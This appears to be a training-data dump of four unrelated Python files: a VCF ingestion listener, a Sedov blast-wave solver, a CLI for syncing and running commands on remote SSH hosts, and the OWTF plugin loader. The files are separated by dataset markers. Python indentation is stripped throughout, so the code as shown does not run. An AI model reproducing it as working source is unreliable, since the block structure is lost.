# if we had no errors, patch the file status to 'Ingested'
if error > 0:
self.set_status(uuid, STATUS_ERROR)
self.patch_ingestion_report(variant_builder.ingestion_report, uuid)
else:
self.set_status(uuid, STATUS_INGESTED)
discard(message)
# This is just fallback cleanup in case messages weren't cleaned up within the loop.
# In normal operation, they will be.
self.delete_messages(messages)
def run(vapp=None, _queue_manager=None, _update_status=None):
""" Entry-point for the ingestion listener for waitress. """
ingestion_listener = IngestionListener(vapp, _queue_manager=_queue_manager, _update_status=_update_status)
try:
ingestion_listener.run()
except Exception as e:
debuglog(str(e))
raise
class ErrorHandlingThread(threading.Thread):
""" Must be duplicated here so logging is correct. """
def run(self):
# interval = self._kwargs.get('interval', DEFAULT_INTERVAL)
interval = 60 # DB polling can and should be slower
update_status = self._kwargs['_update_status'] # noQA - uses private instance variables of parent class
while True:
try:
self._target(*self._args, **self._kwargs) # noQA - uses private instance variables of parent class
except (psycopg2.OperationalError, elasticsearch.exceptions.ConnectionError) as e:
# Handle database restart
log.warning('Database not there, maybe starting up: %r', e)
update_status(msg=repr(e))
log.debug('sleeping')
time.sleep(interval)
continue
except Exception as e:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in ingestion listener, restarting process at next request: %s' % e)
os.kill(os.getpid(), signal.SIGINT)
break
# Composite Application (for wsgi)
def composite(loader, global_conf, **settings):
""" This is a composite pyramid app, meant to run components of an application
or an application extension. In our case we are running the ingestion listener,
which requires executing a command with application context. This code lives
in encoded top-level as it is a wsgi entry-point. Note that the local deployment
does NOT run the listener this way, but runs the run method through main directly.
This code is heavily based off of the es_index_listener in snovault.
"""
listener = None
# Register before app creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
vapp = VirtualApp(app, environ)
timestamp = datetime.datetime.utcnow().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'msgs': []
},
}
def update_status(msg=None, **kw):
""" Method passed to run to update "global" status. """
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw) # can hold generic info
if msg is not None:
status['msgs'].append(msg)
status_holder['status'] = status
kwargs = {
'vapp': vapp,
'_update_status': update_status
}
# daemon thread that actually executes `run` method to call /index
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('WSGI Ingestion Listener Started')
listener.start()
# Register after virtualapp creation.
@atexit.register
def shutdown_listener():
""" Echo a statement at shutdown """
log.debug('shutting down listening thread')
def status_app(environ, start_response):
""" Allows you to get the status of the ingestion "manager". This will be much
more useful once multi-processing is thrown at ingestion.
"""
ignored(environ)
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
# Command Application (for waitress)
def main():
""" Entry point for the local deployment. """
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description='Listen for VCF File uuids to ingest',
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--app-name', help='Pyramid app name in configfile')
parser.add_argument('--username', '-u', default='IMPORT', help='Import username')
parser.add_argument('--dry-run', action='store_true', help='Do not post variants, just validate')
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
app = paster.get_app(args.config_uri, args.app_name)
config = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': args.username,
}
vapp = VirtualApp(app, config)
return run(vapp)
if __name__ == '__main__':
main()
| StarcoderdataPython |
15277 | <gh_stars>1-10
#Main Sedov Code Module
#Ported to python from fortran code written by <NAME> and <NAME>
#Original Paper and code found at http://cococubed.asu.edu/papers/la-ur-07-2849.pdf
import numpy as np
from globalvars import comvars as gv
from sedov_1d import sed_1d
from sedov_1d_time import sed_1d_time
from matplotlib import pyplot as plt
import pickle
gv.its = 20
# define sedov_main as a function
def sedov_main(geom_in, omega_in, time_in, blast_energy, gamma_in, outfile):
##Explicitly set variables
##Standard Cases
##Spherical constant density should reach r=1 at t=1
nstep = 12000
eblast = blast_energy
gv.xgeom = geom_in
gv.omega = omega_in
#outputfile = ??????
##input parameters
time = time_in
rho0 = 1.225E0
vel0 = 0.0E0
ener0 = 0.0E0
pres0 = 0.0E0
cs0 = 342.3E0
gv.gamma = gamma_in
##number of grid points, spatial domain, spatial stepsize.
    ##to match hydrocode output, use the mid-cell points.
#zpos = array of spatial points
zlo = 0.0E0
zhi = 1.2E3
zstep = (zhi - zlo)/float(nstep)
zpos = np.arange(zlo + zstep, zhi + zstep, zstep)
den, vel, pres, enertot, enertherm, enerkin, mach, zpos = sed_1d(time, nstep, zpos, eblast, rho0, vel0, ener0, pres0, cs0, gv)
#create final dictionary to pickle
###dictionary is a flexible array
single_time_output = {'density': den, 'velocity': vel, 'pressure': pres,
'total_energy': enertot, 'thermal_energy': enertherm,
'kinetic_energy': enerkin, 'mach': mach, 'position': zpos}
#open file, pickle and dump data, close file
output = open(outfile, 'wb')
pickle.dump(single_time_output, output)
output.close()
    #plot outputs vs. position
#zmax controls the maximum of the x-axis on the graphs.
zmax = 1.5 * gv.r2
plt.plot(zpos, den)
plt.axis([0, zmax, 0, max(den)])
plt.title('Density vs. Position')
plt.ylabel('Density (kg/m^3)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, vel)
plt.axis([0, zmax, 0, max(vel)])
plt.title('Velocity vs. Position')
plt.ylabel('Velocity (m/s)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, pres)
plt.axis([0, zmax, 0, max(pres)])
plt.title('Pressure vs. Position')
plt.ylabel('Pressure (Pa)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, enertot)
plt.axis([0, zmax, 0, max(enertot)])
plt.title('Total Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, enertherm)
plt.axis([0, zmax, 0, max(enertherm)])
plt.title('Thermal Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, enerkin)
plt.axis([0, zmax, 0, max(enerkin)])
plt.title('Kinetic Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.show()
plt.plot(zpos, mach)
plt.axis([0, zmax, 0, max(mach)])
plt.title('Mach Number vs. Position')
plt.ylabel('Mach Number')
plt.xlabel('Position (m)')
plt.show()
#final graph plots scaled density, pressure and velocity one one plot.
plt.plot(zpos, den/max(den), 'b', label = 'Density')
plt.plot(zpos, pres/max(pres), 'g', label = 'Pressure')
plt.plot(zpos, vel/max(vel), 'r', label = 'Velocity')
plt.axis([0, zmax, 0, 1])
plt.legend(loc = 'upper left')
plt.title('Scaled Density, Pressure, and Velocity')
plt.ylabel('Scaled Value (x/max(x))')
plt.xlabel('Position (m)')
plt.show()
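# Illustrative call (placeholder inputs, not a validated test case):
#   sedov_main(geom_in=3.0, omega_in=0.0, time_in=1.0,
#              blast_energy=1.0e12, gamma_in=1.4, outfile='sedov_single.pkl')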
#define function to produce results at different points in time instead of sedov_1d
def sedov_main_time(geom_in, omega_in, time_initial, time_final, time_steps, blast_energy, gamma_in, outfile):
##Explicitly set variables
##Standard Cases
##Spherical constant density should reach r=1 at t=1
nstep = 12000
eblast = blast_energy
gv.xgeom = geom_in
gv.omega = omega_in
#outputfile = ??????
##input parameters
rho0 = 1.225E0
vel0 = 0.0E0
ener0 = 0.0E0
pres0 = 0.0E0
cs0 = 342.3E0
gv.gamma = gamma_in
##number of grid points, spatial domain, spatial stepsize.
    ##to match hydrocode output, use the mid-cell points.
#zpos = array of spatial points
zlo = 0.0E0
zhi = 3.0E2
zstep = (zhi - zlo)/float(nstep)
zposition = np.arange(zlo + zstep, zhi + zstep, zstep)
den_time, vel_time, pres_time, enertot_time, enertherm_time, enerkin_time, mach_time, zpos_time, time = sed_1d_time(time_initial, time_final, time_steps, nstep, zposition, eblast, rho0, vel0, ener0, pres0, cs0, gv)
#create final dictionary to pickle
###dictionary is flexible array
time_step_output = {'density': den_time, 'velocity': vel_time, 'pressure': pres_time,
'total_energy': enertot_time, 'thermal_energy': enertherm_time,
'kinetic_energy': enerkin_time, 'mach': mach_time,
'position': zpos_time, 'time': time}
#open file, pickle and dump data, close file
output = open(outfile, 'wb')
pickle.dump(time_step_output, output)
output.close()
#zmax controls the maximum of the x-axis on the graphs.
zmax = 1.5 * gv.r2
    # for loops graph a plot for each time step in the final solution
for i in range(0, time_steps):
plt.plot(zpos_time[i], den_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Density vs. Position')
plt.ylabel('Density (kg/m^3)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], vel_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Velocity vs. Position')
plt.ylabel('Velocity (m/s)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], pres_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Pressure vs. Position')
plt.ylabel('Pressure (Pa)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], enertot_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Total Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], enertherm_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Thermal Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], enerkin_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Kinetic Energy vs. Position')
plt.ylabel('Energy (J)')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
for i in range(0, time_steps):
plt.plot(zpos_time[i], mach_time[i], label = 't=' + str(time[i]))
plt.xlim([0, zmax])
plt.title('Mach Number vs. Position')
plt.ylabel('Mach Number')
plt.xlabel('Position (m)')
plt.legend(loc = 'upper right', fontsize = 10)
plt.show()
#final graph plots scaled density, pressure and velocity one one plot.
# plt.plot(zpos, den/max(den), 'b', label = 'Density')
# plt.plot(zpos, pres/max(pres), 'g', label = 'Pressure')
# plt.plot(zpos, vel/max(vel), 'r', label = 'Velocity')
# plt.axis([0, zmax, 0, 1])
# plt.legend(loc = 'upper left')
# plt.title('Scaled Density, Pressure, and Velocity')
# plt.ylabel('Scaled Value (x/max(x))')
# plt.xlabel('Position (m)')
# plt.show()
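# Illustrative call of the time-sweep variant (placeholder inputs):
#   sedov_main_time(geom_in=3.0, omega_in=0.0, time_initial=0.1, time_final=1.0,
#                   time_steps=5, blast_energy=1.0e12, gamma_in=1.4, outfile='sedov_time.pkl')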
| StarcoderdataPython |
1760713 | <reponame>ob/remote
import logging
import re
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from functools import wraps
from pathlib import Path
from typing import List, Optional, Union
import click
from .configuration import WorkspaceConfig
from .configuration.discovery import get_configuration_medium, load_cwd_workspace_config, save_config
from .configuration.shared import HOST_REGEX, PATH_REGEX
from .exceptions import InvalidInputError, RemoteError
from .explain import explain
from .util import CommunicationOptions, ForwardingOptions
from .workspace import SyncedWorkspace
BASE_LOGGING_FORMAT = "%(message)s"
CONNECTION_STRING_FORMAT_REGEX = re.compile(f"^{HOST_REGEX}(:{PATH_REGEX})?$")
DEFAULT_CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
EXECUTION_CONTEXT_SETTINGS = dict(
help_option_names=["-h", "--help"], ignore_unknown_options=True, allow_interspersed_args=False
)
def log_exceptions(f):
"""A decorator that prints the custom exceptions and exit, but propagates internal ones"""
@wraps(f)
def wrapper(*args, **kwards):
try:
f(*args, **kwards)
except Exception as e:
if isinstance(e, RemoteError):
click.secho(str(e), fg="yellow")
sys.exit(1)
raise
return wrapper
def validate_connection_string(ctx, param, value):
matcher = CONNECTION_STRING_FORMAT_REGEX.match(value)
if matcher is None:
raise click.BadParameter(
"Please fix value to match the specified format for connection string", ctx=ctx, param=param
)
return value
def int_or_str_label(label: Optional[str]) -> Optional[Union[int, str]]:
"""Try to convert the label to int and return the result, if it's not successful, return the label"""
if label is None:
return None
try:
# Users enter indexes starting with 1 and internally we use indexes starting with 0
return int(label) - 1
except ValueError:
return label
def check_command(command: List[str]):
if command and command[0].startswith("-"):
# Our execution entry points use ignore_unknown_options=True and allow_interspersed_args=False
# to be able to stream the command to the remote machine. However, there is a downside.
# If user runs this command with an unknown option, this option will become a part of the command.
# That's why we need to manually check if the command starts with an unknown option and print an
# error message in this case.
ctx = click.get_current_context()
click.echo(ctx.get_usage())
click.echo(f"Try '{ctx.info_name} -h' for help\n\nError: no such option {command[0]}")
sys.exit(2)
def _add_remote_host(config: WorkspaceConfig, connection: str):
"""Add a new remote host to the workspace config, check the connection, and save it if connection is ok
    :param config: the workspace config description object
:param connection: connection string in format of 'host-name[:remote_dir]'
"""
parts = connection.split(":")
remote_host = parts[0]
config_medium = get_configuration_medium(config)
remote_dir = config_medium.generate_remote_directory(config) if len(parts) == 1 else Path(parts[1])
added, index = config.add_remote_host(remote_host, remote_dir)
if not added:
click.echo(f"{connection} already exists in config")
sys.exit(0)
# Check if we can connect to the remote host and create a directory there
workspace = SyncedWorkspace.from_config(config, config.root, index)
try:
workspace.create_remote()
except RemoteError:
click.secho(f"Failed to create {workspace.remote.directory} on remote host {remote_host}", fg="yellow")
click.secho("Please check if host is accessible via SSH", fg="yellow")
sys.exit(1)
click.echo(f"Created remote directory at {workspace.remote.host}:{workspace.remote.directory}")
click.echo("Remote is configured and ready to use")
# No errors when executing the above code means we can save the config
config_medium.save_config(config)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.argument("connection", metavar="host-name[:remote_dir]", callback=validate_connection_string)
@log_exceptions
def remote_add(connection: str):
"""Add one more host for remote connection to a config file"""
config = load_cwd_workspace_config()
_add_remote_host(config, connection)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.argument("connection", metavar="host-name[:remote_dir]", callback=validate_connection_string)
@log_exceptions
def remote_init(connection: str):
"""Initiate workspace for the remote execution in the current working directory"""
try:
workspace = load_cwd_workspace_config()
if workspace.root == Path.cwd():
click.secho("A configured workspace already exists in the current working directory.", fg="yellow")
else:
click.secho(
f"A configured workspace already initiated in the current working directory's parent {workspace.root}.",
fg="yellow",
)
click.secho("If you want to add a new host to it, please use remote-add.", fg="yellow")
sys.exit(1)
except RemoteError:
# we expect it to fail. It means we don't overwrite an existing workspace
pass
config = WorkspaceConfig.empty(Path.cwd())
_add_remote_host(config, connection)
# help out with .gitignore if we are in a git repository
if not (config.root / ".git").exists():
return
# make sure we don't keep adding to .gitignore
gitignore = config.root / ".gitignore"
if gitignore.exists():
for line in gitignore.read_text().splitlines():
if line.startswith(".remote"):
return
with gitignore.open("a") as f:
f.write("\n")
f.write(".remote*")
f.write("\n")
click.echo("Added '.remote*' to .gitignore")
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option(
"-p", "--push", is_flag=True, help="add IGNORE pattern to push ignore list (mutually exclusive with '--pull')"
)
@click.option(
"-l", "--pull", is_flag=True, help="add IGNORE pattern to pull ignore list (mutually exclusive with '--push')"
)
@click.argument("ignore", nargs=-1, required=True)
@log_exceptions
def remote_ignore(ignore: List[str], push: bool, pull: bool):
"""Add new IGNORE patterns to the ignores list
IGNORE pattern should be a string in rsync-friendly format.
If no options provided these patterns will be ignored on both push and pull
"""
config = load_cwd_workspace_config()
if not push and not pull:
config.ignores.add(ignore)
elif pull and not push:
config.ignores.pull.add(ignore)
elif push and not pull:
config.ignores.push.add(ignore)
else:
raise InvalidInputError("You cannot use both '--pull' and '--push' flags")
config.ignores.trim()
save_config(config)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@log_exceptions
def remote_host():
"""Print the default remote host in use and exit"""
workspace = SyncedWorkspace.from_cwd()
click.echo(workspace.remote.host)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.argument("index", type=int)
@log_exceptions
def remote_set(index: int):
"""Set a new default remote host for the workspace
    INDEX is an index of host in config file to use by default (starting from 1)
"""
config = load_cwd_workspace_config()
if len(config.configurations) < index:
click.secho(
f"Index is too big ({index}). Only have {len(config.configurations)} hosts to choose from.", fg="yellow"
)
sys.exit(1)
elif index < 1:
click.secho("Index should be 1 or higher", fg="yellow")
sys.exit(1)
# we use 0-base index internally
index = index - 1
config.default_configuration = index
save_config(config)
click.echo(f"Remote host is set to {config.configurations[index].host}")
@click.command(context_settings=EXECUTION_CONTEXT_SETTINGS)
@click.option("-n", "--dry-run", is_flag=True, help="do a dry run of the whole cycle")
@click.option("-m", "--mirror", is_flag=True, help="mirror local files on the remote host")
@click.option("-v", "--verbose", is_flag=True, help="increase verbosity")
@click.option("-e", is_flag=True, help="(deprecated) kept for backward compatibility, noop")
@click.option(
"-t",
"--tunnel",
"port_args",
type=str,
help="Enable local port forwarding. Pass value as <remote port>:<local port>. \
If local port is not passed, the local port value would be set to <remote port> value by default",
)
@click.option(
"-s",
"--stream-changes",
default=False,
is_flag=True,
help="Resync local changes if any while the command is being run remotely",
)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.option("--multi", is_flag=True, help="sync and run the remote commands on each remote host from config")
@click.option(
"--log",
type=click.Path(file_okay=False, resolve_path=True),
help="Write sync and remote command output to the log file instead of stdout. "
"Log file will be located inside DIRECTORY/<timestamp>/<host>_output.log",
)
@click.argument("command", nargs=-1, required=True)
@log_exceptions
def remote(
command: List[str],
dry_run: bool,
mirror: bool,
verbose: bool,
e: bool,
port_args: Optional[str],
label: Optional[str],
stream_changes: bool,
log: Optional[str],
multi: bool,
):
"""Sync local workspace files to remote machine, execute the COMMAND and sync files back regardless of the result"""
check_command(command)
if verbose:
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
ports = ForwardingOptions.from_string(port_args) if port_args else None
if multi and label:
raise InvalidInputError("--multi and --label options cannot be used together")
workspaces = SyncedWorkspace.from_cwd_mass() if multi else [SyncedWorkspace.from_cwd(int_or_str_label(label))]
with ThreadPoolExecutor(max_workers=len(workspaces)) as executor:
futures = {}
descriptors = []
start_timestamp = datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
for workspace in workspaces:
host = workspace.remote.host
if multi or log:
# We save logs into the <log_dir>/<timestamp>/<hostname>_output.log
log_dir = Path(log) if log else (workspace.local_root / "logs")
log_dir = log_dir / start_timestamp
log_dir.mkdir(parents=True, exist_ok=True)
try:
# If the logs are enabled and they are inside the workspace root, we need to exclude them from
# syncing
relative_path = log_dir.relative_to(workspace.local_root)
workspace.ignores.add([f"{relative_path}/*_output.log"])
except ValueError:
# Value error means that logs are placed outside of the workspace root
pass
fd = (log_dir / f"{host}_output.log").open("w")
descriptors.append(fd)
workspace.communication = CommunicationOptions(stdin=None, stdout=fd, stderr=fd)
future = executor.submit(
workspace.execute_in_synced_env,
command,
dry_run=dry_run,
verbose=verbose,
mirror=mirror,
ports=ports,
stream_changes=stream_changes,
)
futures[future] = workspace
final_exit_code = 0
for future in as_completed(list(futures.keys())):
workspace = futures[future]
try:
exit_code = future.result(timeout=0)
if exit_code != 0:
click.secho(f"Remote command on {workspace.remote.host} exited with {exit_code}", fg="yellow")
final_exit_code = exit_code
except Exception as e: # noqa: F841
class_name = e.__class__.__name__
click.secho(f"{class_name}: {e}", fg="yellow")
final_exit_code = 255
for fd in descriptors:
fd.close()
sys.exit(final_exit_code)
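# Illustrative shell usage (assuming the usual console-script names; hosts and paths are placeholders):
#   remote-init build-host:~/workspaces/myproject
#   remote -v --mirror make test        # push, run remotely, pull results back
#   remote --multi ./run_benchmarks.sh  # run on every configured host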
@click.command(context_settings=EXECUTION_CONTEXT_SETTINGS)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.argument("command", nargs=-1, required=True)
@log_exceptions
def remote_quick(command: List[str], label: Optional[str]):
"""Execute the COMMAND remotely"""
check_command(command)
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
code = workspace.execute(command, raise_on_error=False)
sys.exit(code)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-n", "--dry-run", is_flag=True, help="do a dry run of a pull")
@click.option("-v", "--verbose", is_flag=True, help="increase verbosity")
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.argument("path", nargs=-1)
@log_exceptions
def remote_pull(dry_run: bool, verbose: bool, path: List[str], label: Optional[str]):
"""Bring in files from the default remote directory to local workspace.
Optionally bring in PATH instead of the whole workspace.
PATH is a path of file or directory to bring back relative to the remote workspace root.
All sync exclude rules will be omitted if PATH is provided.
"""
if verbose:
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
if not path:
workspace.pull(info=True, verbose=verbose, dry_run=dry_run)
return
for subpath in path:
workspace.pull(info=True, verbose=verbose, dry_run=dry_run, subpath=Path(subpath))
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-n", "--dry-run", is_flag=True, help="do a dry run of a push")
@click.option("-m", "--mirror", is_flag=True, help="mirror local files on the remote host")
@click.option("-v", "--verbose", is_flag=True, help="increase verbosity")
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.option(
"--multi", is_flag=True, help="push files to all available remote workspaces instead of pushing to the default one"
)
@log_exceptions
def remote_push(dry_run: bool, mirror: bool, verbose: bool, multi: bool, label: Optional[str]):
"""Push local workspace files to the remote directory"""
if verbose:
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
if multi and label:
raise InvalidInputError("--multi and --label options cannot be used together")
workspaces = SyncedWorkspace.from_cwd_mass() if multi else [SyncedWorkspace.from_cwd(int_or_str_label(label))]
for workspace in workspaces:
workspace.push(info=True, verbose=verbose, dry_run=dry_run, mirror=mirror)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@log_exceptions
def remote_delete(label: Optional[str]):
"""Delete the remote directory"""
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
workspace.clear_remote()
click.echo(f"Successfully deleted {workspace.remote.directory} on host {workspace.remote.host}")
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@click.option("-l", "--label", help="use the host that has corresponding label for the remote execution")
@click.option("-d", "--deep", is_flag=True, help="check latency and download/upload speed if connection is ok")
@log_exceptions
def remote_explain(label: Optional[str], deep: bool):
"""Print out various debug information to debug the workspace"""
logging.basicConfig(level=logging.INFO, format=BASE_LOGGING_FORMAT)
workspace = SyncedWorkspace.from_cwd(int_or_str_label(label))
explain(workspace, deep)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@log_exceptions
def mremote():
click.secho("mremote is deprecated. Please use 'remote --multi' instead.", fg="yellow")
sys.exit(1)
@click.command(context_settings=DEFAULT_CONTEXT_SETTINGS)
@log_exceptions
def mremote_push():
click.secho("mremote-push is deprecated. Please use 'remote-push --multi' instead.", fg="yellow")
sys.exit(1)
| StarcoderdataPython |
76235 | <reponame>Udbhavbisarya23/owtf<gh_stars>1000+
"""
owtf.managers.plugin
~~~~~~~~~~~~~~~~~~~~
This module manages the plugins and their dependencies
"""
import imp
import json
import os
from owtf.models.plugin import Plugin
from owtf.models.test_group import TestGroup
from owtf.settings import PLUGINS_DIR
from owtf.utils.error import abort_framework
from owtf.utils.file import FileOperations
TEST_GROUPS = ["web", "network", "auxiliary"]
def get_test_groups_config(file_path):
"""Reads the test groups from a config file
.. note::
This needs to be a list instead of a dictionary to preserve order in python < 2.7
:param file_path: The path to the config file
:type file_path: `str`
:return: List of test groups
:rtype: `list`
"""
test_groups = []
config_file = FileOperations.open(file_path, "r").read().splitlines()
for line in config_file:
if "#" == line[0]:
continue # Skip comments
try:
code, priority, descrip, hint, url = line.strip().split(" | ")
except ValueError:
abort_framework(
"Problem in Test Groups file: '{!s}' -> Cannot parse line: {!s}".format(
file_path, line
)
)
if len(descrip) < 2:
descrip = hint
if len(hint) < 2:
hint = ""
test_groups.append(
{
"code": code,
"priority": priority,
"descrip": descrip,
"hint": hint,
"url": url,
}
)
return test_groups
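# Illustrative line from a test-groups config file as parsed above (field values are made
# up); fields are separated by ' | ' and lines starting with '#' are skipped:
#
#     OWTF-IG-004 | 2 | Web Application Fingerprint | Identify the web server | https://owasp.org/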
def load_test_groups(session, file_default, file_fallback, plugin_group):
"""Load test groups into the DB.
:param test_groups_file: The path to the test groups config
:type test_groups_file: `str`
:param plugin_group: Plugin group to load
:type plugin_group: `str`
:return: None
:rtype: None
"""
file_path = file_default
if not os.path.isfile(file_default):
file_path = file_fallback
test_groups = get_test_groups_config(file_path)
for group in test_groups:
session.merge(
TestGroup(
code=group["code"],
priority=group["priority"],
descrip=group["descrip"],
hint=group["hint"],
url=group["url"],
group=plugin_group,
)
)
session.commit()
def load_plugins(session):
"""Loads the plugins from the filesystem and updates their info.
.. note::
Walks through each sub-directory of `PLUGINS_DIR`.
For each file, loads it thanks to the imp module.
Updates the database with the information for each plugin:
+ 'title': the title of the plugin
+ 'name': the name of the plugin
+ 'code': the internal code of the plugin
+ 'group': the group of the plugin (ex: web)
+ 'type': the type of the plugin (ex: active, passive, ...)
+ 'descrip': the description of the plugin
+ 'file': the filename of the plugin
+ 'internet_res': does the plugin use internet resources?
:return: None
:rtype: None
"""
# TODO: When the -t, -e or -o is given to OWTF command line, only load
# the specific plugins (and not all of them like below).
# Retrieve the list of the plugins (sorted) from the directory given by
# 'PLUGIN_DIR'.
plugins = []
for root, _, files in os.walk(PLUGINS_DIR):
plugins.extend(
[
os.path.join(root, filename)
for filename in files
if filename.endswith("py")
]
)
plugins = sorted(plugins)
# Retrieve the information of the plugin.
for plugin_path in plugins:
# Only keep the relative path to the plugin
plugin = plugin_path.replace(PLUGINS_DIR, "")
# TODO: Using os.path.sep might not be portable especially on
# Windows platform since it allows '/' and '\' in the path.
# Retrieve the group, the type and the file of the plugin.
# Ensure all empty strings are removed from the list
chunks = list(filter(None, plugin.split(os.path.sep)))
# TODO: Ensure that the variables group, type and file exist when
# the length of chunks is less than 3.
if len(chunks) == 3:
group, type, file = chunks
# Retrieve the internal name and code of the plugin.
name, code = os.path.splitext(file)[0].split("@")
# Only load the plugin if in XXX_TEST_GROUPS configuration (e.g. web_testgroups.cfg)
if session.query(TestGroup).get(code) is None:
continue
# Load the plugin as a module.
filename, pathname, desc = imp.find_module(
os.path.splitext(os.path.basename(plugin_path))[0],
[os.path.dirname(plugin_path)],
)
plugin_module = imp.load_module(
os.path.splitext(file)[0], filename, pathname, desc
)
        # Try to retrieve the `attr` dictionary from the module and convert
# it to json in order to save it into the database.
attr = None
try:
attr = json.dumps(plugin_module.ATTR)
except AttributeError: # The plugin didn't define an attr dict.
pass
# Save the plugin into the database.
session.merge(
Plugin(
key="{!s}@{!s}".format(type, code),
group=group,
type=type,
title=name.title().replace("_", " "),
name=name,
code=code,
file=file,
descrip=plugin_module.DESCRIPTION,
attr=attr,
)
)
session.commit()
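# Illustrative plugin path that the directory walk above expects (names are made up):
#
#     PLUGINS_DIR/web/active/Web_Application_Fingerprint@OWTF-IG-004.py
#
# i.e. <group>/<type>/<name>@<code>.py, where <code> must already exist in the TestGroup
# table for the plugin to be registered.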
def get_types_for_plugin_group(session, plugin_group):
"""Get available plugin types for a plugin group
:param plugin_group: Plugin group
:type plugin_group: `str`
:return: List of available plugin types
:rtype: `list`
"""
plugin_types = session.query(Plugin.type).filter_by(
group=plugin_group
).distinct().all()
plugin_types = [i[0] for i in plugin_types]
return plugin_types
def plugin_gen_query(session, criteria):
"""Generate a SQLAlchemy query based on the filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return:
:rtype:
"""
query = session.query(Plugin).join(TestGroup)
if criteria.get("type", None):
if isinstance(criteria["type"], str):
query = query.filter(Plugin.type == criteria["type"])
if isinstance(criteria["type"], list):
query = query.filter(Plugin.type.in_(criteria["type"]))
if criteria.get("group", None):
if isinstance(criteria["group"], str):
query = query.filter(Plugin.group == criteria["group"])
if isinstance(criteria["group"], list):
query = query.filter(Plugin.group.in_(criteria["group"]))
if criteria.get("code", None):
if isinstance(criteria["code"], str):
query = query.filter(Plugin.code == criteria["code"])
if isinstance(criteria["code"], list):
query = query.filter(Plugin.code.in_(criteria["code"]))
if criteria.get("name", None):
if isinstance(criteria["name"], str):
query = query.filter(Plugin.name == criteria["name"])
if isinstance(criteria["name"], list):
query = query.filter(Plugin.name.in_(criteria["name"]))
return query.order_by(TestGroup.priority.desc())
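# e.g. plugin_gen_query(session, {"group": "web", "type": ["active", "semi_passive"]})
# builds a query for every active or semi-passive web plugin, ordered by test-group priority.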
def get_all_plugin_dicts(session, criteria=None):
"""Get plugin dicts based on filter criteria
:param criteria: Filter criteria
:type criteria: `dict`
:return: List of plugin dicts
:rtype: `list`
"""
if criteria is None:
criteria = {}
if "code" in criteria:
criteria["code"] = Plugin.name_to_code(session, criteria["code"])
query = plugin_gen_query(session, criteria)
plugin_obj_list = query.all()
